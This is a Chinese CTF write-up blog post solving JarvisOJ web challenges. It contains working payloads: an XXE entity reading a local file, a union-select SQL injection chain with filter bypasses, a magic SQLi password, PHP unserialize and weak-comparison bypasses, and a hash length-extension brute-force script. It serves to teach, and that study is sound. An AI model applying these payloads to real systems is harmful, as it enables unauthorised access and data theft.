<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="JarvisOJ - Web の Write-Up Part 1"><meta name="keywords" content="Web"><meta name="author" content="ColdSnap"><meta name="copyright" content="ColdSnap"><title>JarvisOJ - Web の Write-Up Part 1 | ColdSnap の Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-4826942730187324',
  enable_page_level_ads: 'true'
});
</script><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ColdSnap の Blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Port-51"><span class="toc-number">1.</span> <span class="toc-text">Port 51</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Localhost"><span class="toc-number">2.</span> <span class="toc-text">Localhost</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Login"><span class="toc-number">3.</span> <span class="toc-text">Login</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%9E%E7%9B%BE%E5%B1%80%E7%9A%84%E7%A7%98%E5%AF%86"><span class="toc-number">4.</span> <span class="toc-text">神盾局的秘密</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Admin"><span class="toc-number">5.</span> <span class="toc-text">Admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#API%E8%B0%83%E7%94%A8"><span class="toc-number">6.</span> <span class="toc-text">API调用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Flag%E5%9C%A8%E7%AE%A1%E7%90%86%E5%91%98%E6%89%8B%E9%87%8C"><span class="toc-number">7.</span> <span class="toc-text">Flag在管理员手里</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IN-A-Mess"><span class="toc-number">8.</span> <span class="toc-text">IN A Mess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AC%B2%E7%9F%A5%E5%90%8E%E4%BA%8B%E5%A6%82%E4%BD%95%EF%BC%8C%E8%AF%B7%E5%90%AC%E4%B8%8B%E5%9B%9E%E5%88%86%E8%A7%A3"><span class="toc-number">9.</span> <span class="toc-text">欲知后事如何，请听下回分解</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">ColdSnap</div><div class="author-info__description text-center">Welcome to ColdSnap の Blog</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Coldwave96">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">91</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">41</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">35</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://bodhidharmalu.github.io">Tigerlu</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://ghealer.top">Ghealer</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/background.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">ColdSnap の Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/Library">Library</a><a class="site-page" href="/Tools">Tools</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">JarvisOJ - Web の Write-Up Part 1</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-03-11</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/WriteUPs/">WriteUPs</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/WriteUPs/JarvisOJ/">JarvisOJ</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.6k</span><span class="post-meta__separator">|</span><span>阅读时长: 7 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>很久之前就有朋友给我推荐了这个CTF平台，玩了一段时间，基本把所有的WEB题目都做完了，写个WP记录一下过程。</p>
<span id="more"></span>

<h2 id="Port-51"><a href="#Port-51" class="headerlink" title="Port 51"></a>Port 51</h2><p>打开界面之后提示我们通过51端口访问：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB1.png"></p>
<p>根据提示通过curl指定本地端口即可获得flag：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB2.png"></p>
<p><img src="/img/JarvisOJ-WEB-1/WEB3.png"></p>
<h2 id="Localhost"><a href="#Localhost" class="headerlink" title="Localhost"></a>Localhost</h2><p>打开后提示只能通过本地地址访问：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB4.png"></p>
<p>通过抓包在文件头添加<code>X-Forwarded-For：127.0.0.1</code>标签，伪造localhost地址即可获得flag。</p>
<h2 id="Login"><a href="#Login" class="headerlink" title="Login"></a>Login</h2><p>打开界面就是一个密码输入框：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB5.png"></p>
<p>随便输入一个密码提示密码错误。试了很久注入，也没什么头绪，就抓包看一下：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB6.png"></p>
<p>果然提示了一个hint，这是一个SQL注入，需要通过寻找合适的密码构造<code>SELECT * FROM admin WHERE username = &#39;admin&#39; and password = &#39;&#39; or &#39;XXX</code>这样的语句。</p>
<p>这里提供一个：ffifdyop，输入后提交即可获得flag。</p>
<h2 id="神盾局的秘密"><a href="#神盾局的秘密" class="headerlink" title="神盾局的秘密"></a>神盾局的秘密</h2><p>打开后就是一张神盾局logo的图片，查看下源码有个很有趣的地方：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB7.png"></p>
<p>点进去一看就是一张图片，但是是被解析成脚本的，再解码一下img后面的参数为shield.jpg。猜测img参数存在文件包含漏洞，将index.php通过base64加密得到aW5kZXgucGhw，提交后得到下面的源码：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB8.png"></p>
<p>接下来base64加密shield.php，提交c2hpZWxkLnBocA&#x3D;&#x3D;，得到下图：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB9.png"></p>
<p>直接访问pctf.php,<code>http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=</code>却提示文件不存在。</p>
<p>回头重新分析index.php源码，发现参数输入class，反序列化函数和过滤，改写shield.php源代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="comment">//flag is in pctf.php</span></span><br><span class="line">	<span class="class"><span class="keyword">class</span> <span class="title">Shield</span> </span>&#123;</span><br><span class="line">		<span class="keyword">public</span> <span class="variable">$file</span>;</span><br><span class="line">		<span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$filename</span> = <span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">			<span class="variable language_">$this</span> -&gt; file = <span class="variable">$filename</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="function"><span class="keyword">function</span> <span class="title">readfile</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">			<span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable language_">$this</span>-&gt;file) &amp;&amp; <span class="title function_ invoke__">stripos</span>(<span class="variable">$this</span>-&gt;file,<span class="string">&#x27;..&#x27;</span>)===<span class="literal">FALSE</span>  </span><br><span class="line">			&amp;&amp; <span class="title function_ invoke__">stripos</span>(<span class="variable">$this</span>-&gt;file,<span class="string">&#x27;/&#x27;</span>)===<span class="literal">FALSE</span> &amp;&amp; <span class="title function_ invoke__">stripos</span>(<span class="variable">$this</span>-&gt;file,<span class="string">&#x27;\\&#x27;</span>)==<span class="literal">FALSE</span>) &#123;</span><br><span class="line">				<span class="keyword">return</span> @<span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$this</span>-&gt;file);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="variable">$x</span> = <span class="keyword">new</span> <span class="title class_">Shield</span>(<span class="string">&#x27;pctf.php&#x27;</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$x</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>本地运行，得到class参数的值。O:6:”Shield”:1:{s:4:”file”;s:8:”pctf.php”;}</p>
<p>访问<code>http://web.jarvisoj.com:32768/index.php?class=O:6:&quot;Shield&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;pctf.php&quot;;&#125;</code>查看源代码得到flag:</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB10.png"></p>
<h2 id="Admin"><a href="#Admin" class="headerlink" title="Admin"></a>Admin</h2><p>访问页面只有hello world，扫了下网站目录，发现有robots.txt，然后指向admin_s3cr3t.php。</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB11.png"></p>
<p>但是这是个错误的flag。再次失去线索，尝试burp抓包试一下:</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB12.png"></p>
<p>果然发现一个有趣的admin&#x3D;0，结合题目，改包admin&#x3D;1提交获取flag。</p>
<h2 id="API调用"><a href="#API调用" class="headerlink" title="API调用"></a>API调用</h2><p>打开后是一个提交框，查看源码有具体脚本：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB13.png"></p>
<p>抓包发现提交的只是特定的值，默认格式是json：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB14.png"></p>
<p>其实这里存在XXE漏洞，将Content-Type的值为application&#x2F;xml,然后传入xml代码：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">root</span> [<span class="meta">&lt;!ENTITY <span class="keyword">file</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///home/ctf/flag.txt&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span><span class="symbol">&amp;file;</span><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>即可得到flag。</p>
<h2 id="Flag在管理员手里"><a href="#Flag在管理员手里" class="headerlink" title="Flag在管理员手里"></a>Flag在管理员手里</h2><p>打开提示只有admin才能看见flag，burp抓包发现奇怪的cookie：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB15.png"></p>
<p>其实之前在实验吧玩过同样的套路，这是hash长度扩展攻击。真正的解题在于存在源码泄露,在<code>http://web.jarvisoj.com:32778/index.php~</code>可以找到源码，然后知道这是hash长度扩展攻击。</p>
<p>不过这题比实验吧更大的难度在于不知道盐的长度，所以采用爆破的方法：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashpumpy</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">30</span>):</span><br><span class="line">	m=hashpumpy.hashpump(<span class="string">&#x27;3a4727d57463f122833d9e732f94e4e0&#x27;</span>,<span class="string">&#x27;;\&quot;tseug\&quot;:5:s&#x27;</span>,<span class="string">&#x27;;\&quot;nimda\&quot;:5:s&#x27;</span>,i)</span><br><span class="line">	<span class="built_in">print</span> i		</span><br><span class="line">	url=<span class="string">&#x27;http://120.26.131.152:32778/&#x27;</span></span><br><span class="line">	digest=m[<span class="number">0</span>]</span><br><span class="line">	</span><br><span class="line">	message=urllib.quote(urllib.unquote(m[<span class="number">1</span>])[::-<span class="number">1</span>])</span><br><span class="line">	cookie=<span class="string">&#x27;role=&#x27;</span>+message+<span class="string">&#x27;; hsh=&#x27;</span>+digest</span><br><span class="line">	<span class="comment">#print cookie</span></span><br><span class="line">	headers=&#123;</span><br><span class="line">	<span class="string">&#x27;cookie&#x27;</span>: cookie,</span><br><span class="line">	<span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;Accept-Language&#x27;</span>: <span class="string">&#x27;:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&#x27;</span>,</span><br><span class="line">	<span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">	<span class="built_in">print</span> headers</span><br><span class="line">	re=requests.get(url=url,headers=headers)</span><br><span class="line">	<span class="built_in">print</span> re.text</span><br><span class="line">	<span class="keyword">if</span> <span class="string">&quot;Welcome&quot;</span> <span class="keyword">in</span> re.text:</span><br><span class="line">		<span class="built_in">print</span> re;</span><br><span class="line">		<span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>运行程序然后构造最终的cookie：</p>
<p><code>role=s%3A5%3A%22admin%22%3B%00%00%00%00%00%00%00%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80s%3A5%3A%22guest%22%3B; hsh=fcdc3840332555511c4e4323f6decb07</code></p>
<p><img src="/img/JarvisOJ-WEB-1/WEB16.png"></p>
<h2 id="IN-A-Mess"><a href="#IN-A-Mess" class="headerlink" title="IN A Mess"></a>IN A Mess</h2><p>打开之后查看源码发现一个index.phps提示，访问发现是网站源代码。</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB17.png"></p>
<p>出现3个参数：id，a，b。</p>
<p>id：id&#x3D;&#x3D;0典型的PHP弱比较，利用id&#x3D;0a或id&#x3D;0e123或id&#x3D;asd均可实现绕过。</p>
<p>b：strlen($b)&gt;5 and eregi(“111”.substr($b,0,1),”1114”) and substr($b,0,1)!&#x3D;4) 这里要求：b的长度大于5，且是基于eregi函数的弱类型，用%00的绕过（ strlen函数对%00不截断但substr截断）那么可以令b&#x3D;%00411111。</p>
<p>此处链接一篇<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_31481187/article/details/60968595">博客</a>可供参考。</p>
<p>a：由data进行赋值：$data &#x3D; @file_get_contents($a,’r’) 而又有$data&#x3D;&#x3D;”1112 is a nice lab!” 可以利用远程文件包含在allow_url_include开启时可以使用，但发现对$a有了.过滤所以还是data协议比较稳妥。</p>
<p>此处链接另一篇<a target="_blank" rel="noopener" href="https://blog.csdn.net/lxgwm2008/article/details/38437875">博客</a>可供参考，这里采用的格式是：data:</p>
<p>最后构造payload：id&#x3D;0e&amp;a&#x3D;data:,1112 is a nice lab!&amp;b&#x3D;%00411111，得到：</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB18.png"></p>
<p>看起来像是一个网址，访问一下，页面上没什么东西，但是发现url自动跳转为<code>http://web.jarvisoj.com:32780/%5EHT2mCpcvOLf/index.php?id=1</code>，猜测id参数存在注入漏洞。</p>
<p>经过尝试，发现过滤了空格。改用<code>/**/</code>替代空格发现还是不行，发现<code>/***/</code>可以。同时还过滤了union,select，通过双写可绕过。</p>
<p><img src="/img/JarvisOJ-WEB-1/WEB19.png"></p>
<p><img src="/img/JarvisOJ-WEB-1/WEB20.png"></p>
<p>开始尝试：</p>
<p>id&#x3D;1&#x2F;<em>1</em>&#x2F;order&#x2F;<em>1</em>&#x2F;by&#x2F;<em>1</em>&#x2F;1 显示正常</p>
<p>id&#x3D;1&#x2F;<em>1</em>&#x2F;order&#x2F;<em>1</em>&#x2F;by&#x2F;<em>1</em>&#x2F;2 显示正常</p>
<p>id&#x3D;1&#x2F;<em>1</em>&#x2F;order&#x2F;<em>1</em>&#x2F;by&#x2F;<em>1</em>&#x2F;4 显示错误，字段数为3</p>
<p>id&#x3D;-1&#x2F;<em>12</em>&#x2F;uniunionon&#x2F;<em>12</em>&#x2F;seselectlect&#x2F;<em>12</em>&#x2F;1,2,(database())%23</p>
<p>得到数据库名test。</p>
<p>id&#x3D;-1&#x2F;<em>12</em>&#x2F;uniunionon&#x2F;<em>12</em>&#x2F;seselectlect&#x2F;<em>12</em>&#x2F;1,2,(seselectlect&#x2F;<em>12</em>&#x2F;group_concat(table_name)&#x2F;<em>12</em>&#x2F;frfromom&#x2F;<em>12</em>&#x2F;information_schema.tables&#x2F;<em>12</em>&#x2F;where&#x2F;<em>12</em>&#x2F;table_schema&#x3D;database())%23</p>
<p>得到表名：content。</p>
<p>id&#x3D;-1&#x2F;<em>12</em>&#x2F;uniunionon&#x2F;<em>12</em>&#x2F;seselectlect&#x2F;<em>12</em>&#x2F;1,2,(selselectect&#x2F;<em>12</em>&#x2F;group_concat(column_name)&#x2F;<em>12</em>&#x2F;frofromm&#x2F;<em>12</em>&#x2F;information_schema.columns&#x2F;<em>12</em>&#x2F;where&#x2F;<em>12</em>&#x2F;table_name&#x3D;0x636f6e74656e74)%23</p>
<p>得到列名：context。</p>
<p>id&#x3D;-1&#x2F;<em>12</em>&#x2F;uniunionon&#x2F;<em>12</em>&#x2F;seselectlect&#x2F;<em>12</em>&#x2F;1,2,(selselectect&#x2F;<em>12</em>&#x2F;context&#x2F;<em>12</em>&#x2F;frofromm&#x2F;<em>1</em>&#x2F;content)%23</p>
<p>得到flag：PCTF{Fin4lly_U_got_i7_C0ngRatulation5}。</p>
<h2 id="欲知后事如何，请听下回分解"><a href="#欲知后事如何，请听下回分解" class="headerlink" title="欲知后事如何，请听下回分解"></a>欲知后事如何，请听下回分解</h2></div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ColdSnap</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://coldwave96.github.io/2020/03/11/JarvisOJ-WEB-1/">https://coldwave96.github.io/2020/03/11/JarvisOJ-WEB-1/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://coldwave96.github.io">ColdSnap の Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Web/">Web</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/04/20/MaliciousURLs2/"><i class="fa fa-chevron-left">  </i><span>机器学习实现恶意URL检测Part 2</span></a></div><div class="next-post pull-right"><a href="/2020/01/14/Lampiao/"><span>Vulnhub - Lampiao の Write-Up</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = '' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'R82KAmOmkqMWNJs72Fx4ub1O-gzGzoHsz',
  appKey:'Sq4B8VcTqxJ2qCeJLJa3KbKz',
  placeholder:'Please leave something ^.^',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/background.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2025 By ColdSnap</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="icp"><a><span>Welcome to my world ^.^</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>